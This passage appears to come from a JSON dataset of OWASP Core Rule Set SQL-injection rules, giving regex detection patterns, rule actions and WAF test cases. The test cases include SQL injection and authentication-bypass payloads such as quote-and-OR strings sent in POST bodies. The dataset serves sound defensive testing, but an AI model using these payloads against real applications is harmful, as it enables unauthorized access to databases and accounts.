"var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" }, "expected": { "should_block": false, "rule_ids": [ 942450 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1419, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "/_pk_ref/", "quote_type": "no_quote", "negated": true, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i:\\b0x[a-f\\d]{3,})", "actions": [ { "act_name": "id", "lineno": 1420, "act_quote": "no_quote", "act_arg": "942450", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1421, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1422, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1423, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1424, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1424, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1425, "act_quote": "quotes", "act_arg": "SQL Hex Encoding Identified", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1426, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1427, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1428, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1429, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1430, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1431, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1432, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1433, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1434, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1435, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1436, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1437, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1438, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1419 } }, { "rule_id": "942510", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?:`(?:(?:[\\w\\s=_\\-+{}()<@]){2,29}|(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)`)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQLi bypass attempt by ticks or backticks detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQLi bypass detected: backticks", "test_id": 1, "request": { "method": "GET", "uri": "/get?`bla`", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942510 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "`bla`" } ] }, { "description": "SQLi bypass detected: backticks", "test_id": 2, "request": { "method": "GET", "uri": "/get?'bla'", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942510 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "'bla'" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1466, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?:`(?:(?:[\\w\\s=_\\-+{}()<@]){2,29}|(?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)`)", "actions": [ { "act_name": "id", "lineno": 1467, "act_quote": "no_quote", "act_arg": "942510", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1468, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1469, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1470, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1471, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1471, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1472, "act_quote": "quotes", "act_arg": "SQLi bypass attempt by ticks or backticks detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1473, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1474, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1475, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1476, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1477, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1478, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1479, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1480, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1481, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1482, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1483, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1484, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1485, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1466 } }, { "rule_id": "942520", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\\"'`][\\s\\x0b]*?(?:(?:is[\\s\\x0b]+not|not[\\s\\x0b]+(?:like|glob|(?:betwee|i)n|null|regexp|match)|mod|div|sounds[\\s\\x0b]+like)\\b|[%&\\*\\+\\-/<->\\^\\|]{1,3})", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects basic SQL authentication bypass attempts 4.0/4", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects basic SQL auth bypass with 'is not something'", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=id'is%20not-id--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=id'is%20not-id--" } ] }, { "description": "Negative test: 'is notes", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=id'is%20notes" }, "expected": { "should_block": false, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=id'is%20notes" } ] }, { "description": "Detects basic SQL auth bypass with 'not like something'", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=id'not%20like%20id--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=id'not%20like%20id--" } ] }, { "description": "Detects basic SQL auth bypass with 'not glob'", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=id'not%20glob-id--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=id'not%20glob-id--" } ] }, { "description": "Detects basic SQL auth bypass with 'not like glob'", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=id'not%20glob-id--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=id'not%20glob-id--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%7Cemail--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%7Cemail--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'-email--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'-email--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%252Bemail--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%252Bemail--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%5Eemail--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%5Eemail--" } ] }, { "description": "Nagive test: Detects basic SQL auth bypass with binary operators", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%40email--" }, "expected": { "should_block": false, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%40email--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%26email--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%26email--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%3Cemail--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%3Cemail--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%3Eemail--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%3Eemail--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%3Demail--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%3Demail--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%2Femail--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%2Femail--" } ] }, { "description": "Detects basic SQL auth bypass with binary operators", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%25email--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%25email--" } ] }, { "description": "Negative test: Detects basic SQL auth bypass with binary operators", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'~email--" }, "expected": { "should_block": false, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'~email--" } ] }, { "description": "Detects basic SQL auth bypass with mod", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=x'%20mod%20id--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=x'%20mod%20id--" } ] }, { "description": "Detects basic SQL auth bypass with: sounds like", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='sounds%20like%20rowid--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='sounds%20like%20rowid--" } ] }, { "description": "Bypass with a comment", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='%2F**%2F*2--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='%2F**%2F*2--" } ] }, { "description": "Detect auth bypass email=' is not?--", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=%27%20is%20not%3F--" }, "expected": { "should_block": true, "rule_ids": [ 942520 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=%27%20is%20not%3F--" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1493, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\\"'`][\\s\\x0b]*?(?:(?:is[\\s\\x0b]+not|not[\\s\\x0b]+(?:like|glob|(?:betwee|i)n|null|regexp|match)|mod|div|sounds[\\s\\x0b]+like)\\b|[%&\\*\\+\\-/<->\\^\\|]{1,3})", "actions": [ { "act_name": "id", "lineno": 1494, "act_quote": "no_quote", "act_arg": "942520", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1495, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1496, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1497, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1498, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1498, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1499, "act_quote": "quotes", "act_arg": "Detects basic SQL authentication bypass attempts 4.0/4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1500, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1501, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1502, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1503, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1504, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1505, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1506, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1507, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1508, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1509, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1510, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1511, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1512, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1493 } }, { "rule_id": "942521", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false }, { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)^(?:[^']*?(?:'[^']*?'[^']*?)*?'|[^\\\"]*?(?:\\\"[^\\\"]*?\\\"[^\\\"]*?)*?\\\"|[^`]*?(?:`[^`]*?`[^`]*?)*?`)[\\s\\x0b]*([0-9A-Z_a-z]+)\\b", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects basic SQL authentication bypass attempts 4.1/4", "logdata": "Matched Data: %{TX.0} found within %{TX.942521_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects the most basic authentication bypass with 'or'", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=a'or'a" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=a'or'a" } ] }, { "description": "Detects basic SQLite authentication bypass with 'or?'", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=a'or?--" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=a'or?--" } ] }, { "description": "False-positive: Detects or-based authentication bypass", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=is%20this%20your%20parents'%20or%20yours?" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=is%20this%20your%20parents'%20or%20yours?" } ] }, { "description": "Detects basic SQL auth bypass and-based", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=user'and%20id%20is%20not?--" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=user'and%20id%20is%20not?--" } ] }, { "description": "False-positve: is it your parents' or yours", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=it%20is%20your%20parents'%20and%20yours" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": 